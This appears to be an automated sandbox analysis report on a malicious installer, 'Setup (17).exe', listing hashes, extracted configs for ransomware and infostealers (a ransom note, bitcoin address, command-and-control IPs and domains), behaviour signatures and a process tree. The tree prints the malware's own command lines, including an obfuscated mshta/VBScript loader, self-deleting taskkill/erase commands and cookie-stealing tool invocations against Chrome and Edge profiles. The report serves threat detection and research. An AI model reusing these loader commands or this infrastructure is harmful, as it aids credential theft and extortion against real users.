Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    945s
  • max time network
    1806s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-08-2021 20:54

General

  • Target

    Setup (17).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. PAY FAST 500$=0.013 btc or the price will increase tomorrow bitcoin address bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8 To be sure we have the decryptor and it works you can send an email: payfast290@mail2tor.com and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? payfast290@mail2tor.com TELEGRAM @ payfast290 Your personal ID: 205-857-F46 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Extracted

Family

redline

Botnet

supertraff

C2

135.148.139.222:1494

Extracted

Family

redline

Botnet

24.08

C2

95.181.172.100:55640

Extracted

Family

redline

Botnet

dibild2

C2

135.148.139.222:1494

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • Blocklisted process makes network request 27 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 10 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 15 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 20 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 27 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 31 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 45 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 47 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 8 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 27 IoCs
  • Modifies system certificate store 2 TTPs 16 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 35 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 21 IoCs
  • Suspicious behavior: SetClipboardViewer 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:352
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
      1⤵
        PID:1104
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
        1⤵
        • Drops file in System32 directory
        • Drops file in Windows directory
        PID:928
        • C:\ProgramData\hdise\fldm.exe
          C:\ProgramData\hdise\fldm.exe start
          2⤵
            PID:7528
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Themes
          1⤵
            PID:1228
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1276
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1352
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1852
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                  1⤵
                    PID:2456
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                    1⤵
                      PID:2472
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                      1⤵
                        PID:2616
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                        1⤵
                          PID:2644
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Browser
                          1⤵
                          • Suspicious use of SetThreadContext
                          • Modifies registry class
                          PID:2864
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                            2⤵
                            • Drops file in System32 directory
                            • Checks processor information in registry
                            • Modifies data under HKEY_USERS
                            • Modifies registry class
                            PID:6832
                        • C:\Users\Admin\AppData\Local\Temp\Setup (17).exe
                          "C:\Users\Admin\AppData\Local\Temp\Setup (17).exe"
                          1⤵
                          • Checks computer location settings
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:3900
                          • C:\Users\Admin\Documents\Z2mfN2wLNIRF1r1bazJw2eu7.exe
                            "C:\Users\Admin\Documents\Z2mfN2wLNIRF1r1bazJw2eu7.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:2900
                            • C:\Users\Admin\Documents\Z2mfN2wLNIRF1r1bazJw2eu7.exe
                              "C:\Users\Admin\Documents\Z2mfN2wLNIRF1r1bazJw2eu7.exe"
                              3⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: MapViewOfSection
                              PID:3776
                          • C:\Users\Admin\Documents\cOs_BXQcpZlmNOZWD6UOx6tI.exe
                            "C:\Users\Admin\Documents\cOs_BXQcpZlmNOZWD6UOx6tI.exe"
                            2⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2680
                          • C:\Users\Admin\Documents\4fyosRfKgssQUjdYnxlHh1p4.exe
                            "C:\Users\Admin\Documents\4fyosRfKgssQUjdYnxlHh1p4.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of WriteProcessMemory
                            PID:2540
                            • C:\Users\Admin\Documents\4fyosRfKgssQUjdYnxlHh1p4.exe
                              C:\Users\Admin\Documents\4fyosRfKgssQUjdYnxlHh1p4.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4568
                          • C:\Users\Admin\Documents\llRLdQ6kcchFOZLpQzbtE00U.exe
                            "C:\Users\Admin\Documents\llRLdQ6kcchFOZLpQzbtE00U.exe"
                            2⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2576
                          • C:\Users\Admin\Documents\Nalet2BzKskQn9fcnHV_6iLI.exe
                            "C:\Users\Admin\Documents\Nalet2BzKskQn9fcnHV_6iLI.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:3712
                          • C:\Users\Admin\Documents\YedVUylDyEiGQq86LPtqq8zE.exe
                            "C:\Users\Admin\Documents\YedVUylDyEiGQq86LPtqq8zE.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of WriteProcessMemory
                            PID:2340
                            • C:\Users\Admin\Documents\YedVUylDyEiGQq86LPtqq8zE.exe
                              C:\Users\Admin\Documents\YedVUylDyEiGQq86LPtqq8zE.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4524
                          • C:\Users\Admin\Documents\JA1_mZMAR5dMYoFiys5ONNVm.exe
                            "C:\Users\Admin\Documents\JA1_mZMAR5dMYoFiys5ONNVm.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:2408
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 388
                              3⤵
                              • Program crash
                              PID:4200
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 404
                              3⤵
                              • Program crash
                              PID:5408
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 364
                              3⤵
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4776
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 624
                              3⤵
                              • Program crash
                              PID:5716
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 660
                              3⤵
                              • Program crash
                              PID:4932
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 696
                              3⤵
                              • Program crash
                              PID:5588
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 664
                              3⤵
                              • Program crash
                              PID:5076
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 708
                              3⤵
                              • Program crash
                              PID:1972
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 748
                              3⤵
                              • Program crash
                              PID:7144
                          • C:\Users\Admin\Documents\jyyRfJMJapsUbT7vH6I48cYl.exe
                            "C:\Users\Admin\Documents\jyyRfJMJapsUbT7vH6I48cYl.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:2200
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 480
                              3⤵
                              • Suspicious use of NtCreateProcessExOtherParentProcess
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4052
                          • C:\Users\Admin\Documents\AN8PzFWIb4Cap3ACluJx1Anw.exe
                            "C:\Users\Admin\Documents\AN8PzFWIb4Cap3ACluJx1Anw.exe"
                            2⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:3844
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 760
                              3⤵
                              • Program crash
                              PID:4640
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 784
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5348
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 804
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5556
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 764
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5676
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 956
                              3⤵
                              • Program crash
                              PID:4324
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 984
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5260
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 1032
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5472
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 1436
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5284
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 1464
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4828
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 1388
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5920
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 1664
                              3⤵
                              • Program crash
                              PID:6488
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 1716
                              3⤵
                              • Program crash
                              PID:6780
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 1600
                              3⤵
                              • Suspicious use of NtCreateProcessExOtherParentProcess
                              • Program crash
                              PID:7156
                          • C:\Users\Admin\Documents\_Qh1BFcPPY40MLCF9s58ouEp.exe
                            "C:\Users\Admin\Documents\_Qh1BFcPPY40MLCF9s58ouEp.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3044
                          • C:\Users\Admin\Documents\3eiF6QHUGUnCwF1S1IjvZ9vQ.exe
                            "C:\Users\Admin\Documents\3eiF6QHUGUnCwF1S1IjvZ9vQ.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:956
                          • C:\Users\Admin\Documents\P9Kzl3BXUZn9Fgph2BeDlxqn.exe
                            "C:\Users\Admin\Documents\P9Kzl3BXUZn9Fgph2BeDlxqn.exe"
                            2⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3548
                          • C:\Users\Admin\Documents\55CSt7QvFaXOtj9wKAVdX3Ex.exe
                            "C:\Users\Admin\Documents\55CSt7QvFaXOtj9wKAVdX3Ex.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2384
                            • C:\Users\Admin\Documents\55CSt7QvFaXOtj9wKAVdX3Ex.exe
                              "C:\Users\Admin\Documents\55CSt7QvFaXOtj9wKAVdX3Ex.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2624
                          • C:\Users\Admin\Documents\ZswDK5S0kHgsgpxHlxcKA7GG.exe
                            "C:\Users\Admin\Documents\ZswDK5S0kHgsgpxHlxcKA7GG.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:696
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0838374741.exe"
                              3⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4324
                              • C:\Users\Admin\AppData\Local\Temp\0838374741.exe
                                "C:\Users\Admin\AppData\Local\Temp\0838374741.exe"
                                4⤵
                                • Executes dropped EXE
                                • Drops file in Windows directory
                                PID:5624
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\5906748810.exe"
                              3⤵
                                PID:7388
                                • C:\Users\Admin\AppData\Local\Temp\5906748810.exe
                                  "C:\Users\Admin\AppData\Local\Temp\5906748810.exe"
                                  4⤵
                                    PID:2060
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 744
                                      5⤵
                                      • Program crash
                                      PID:6024
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 760
                                      5⤵
                                      • Program crash
                                      PID:2652
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 764
                                      5⤵
                                      • Program crash
                                      PID:5856
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 800
                                      5⤵
                                      • Program crash
                                      PID:4268
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "ZswDK5S0kHgsgpxHlxcKA7GG.exe" /f & erase "C:\Users\Admin\Documents\ZswDK5S0kHgsgpxHlxcKA7GG.exe" & exit
                                  3⤵
                                    PID:5468
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /im "ZswDK5S0kHgsgpxHlxcKA7GG.exe" /f
                                      4⤵
                                      • Kills process with taskkill
                                      PID:5992
                                • C:\Users\Admin\Documents\FUDHSf7h4zBfFgueJKh_YOLM.exe
                                  "C:\Users\Admin\Documents\FUDHSf7h4zBfFgueJKh_YOLM.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1172
                                  • C:\Users\Admin\AppData\Roaming\8784535.exe
                                    "C:\Users\Admin\AppData\Roaming\8784535.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4924
                                  • C:\Users\Admin\AppData\Roaming\5286563.exe
                                    "C:\Users\Admin\AppData\Roaming\5286563.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5276
                                  • C:\Users\Admin\AppData\Roaming\6455747.exe
                                    "C:\Users\Admin\AppData\Roaming\6455747.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5160
                                  • C:\Users\Admin\AppData\Roaming\6734678.exe
                                    "C:\Users\Admin\AppData\Roaming\6734678.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    PID:4108
                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      PID:812
                                • C:\Users\Admin\Documents\a_8MkmqnV4_KLOdudsLUy16a.exe
                                  "C:\Users\Admin\Documents\a_8MkmqnV4_KLOdudsLUy16a.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4424
                                • C:\Users\Admin\Documents\XsOlBxu3PW74BnHpdJdGFVwV.exe
                                  "C:\Users\Admin\Documents\XsOlBxu3PW74BnHpdJdGFVwV.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:4400
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "XsOlBxu3PW74BnHpdJdGFVwV.exe" /f & erase "C:\Users\Admin\Documents\XsOlBxu3PW74BnHpdJdGFVwV.exe" & exit
                                    3⤵
                                      PID:5216
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /im "XsOlBxu3PW74BnHpdJdGFVwV.exe" /f
                                        4⤵
                                        • Kills process with taskkill
                                        PID:5560
                                  • C:\Users\Admin\Documents\IxVBqDAPDBRQVObZb7uVteh3.exe
                                    "C:\Users\Admin\Documents\IxVBqDAPDBRQVObZb7uVteh3.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Checks BIOS information in registry
                                    • Checks whether UAC is enabled
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4488
                                  • C:\Users\Admin\Documents\vh0Zh0kO6i0rjGATWAiIF89W.exe
                                    "C:\Users\Admin\Documents\vh0Zh0kO6i0rjGATWAiIF89W.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4456
                                  • C:\Users\Admin\Documents\34qKnz8Mn84B8wq6168Hdh3Z.exe
                                    "C:\Users\Admin\Documents\34qKnz8Mn84B8wq6168Hdh3Z.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:5024
                                    • C:\Windows\SysWOW64\mshta.exe
                                      "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\34qKnz8Mn84B8wq6168Hdh3Z.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\34qKnz8Mn84B8wq6168Hdh3Z.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                      3⤵
                                        PID:5772
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\34qKnz8Mn84B8wq6168Hdh3Z.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\34qKnz8Mn84B8wq6168Hdh3Z.exe" ) do taskkill -IM "%~nXW" -f
                                          4⤵
                                            PID:5716
                                            • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                              WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4640
                                              • C:\Windows\SysWOW64\mshta.exe
                                                "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                6⤵
                                                  PID:4968
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                    7⤵
                                                      PID:5724
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                    6⤵
                                                    • Loads dropped DLL
                                                    PID:6376
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill -IM "34qKnz8Mn84B8wq6168Hdh3Z.exe" -f
                                                  5⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:6060
                                          • C:\Users\Admin\Documents\IPIW6IYmWTpRHMihDi7ufLvA.exe
                                            "C:\Users\Admin\Documents\IPIW6IYmWTpRHMihDi7ufLvA.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:5072
                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Drops startup file
                                              PID:5760
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                  PID:5784
                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                  4⤵
                                                    PID:7036
                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    4⤵
                                                      PID:5028
                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                      4⤵
                                                        PID:5100
                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        4⤵
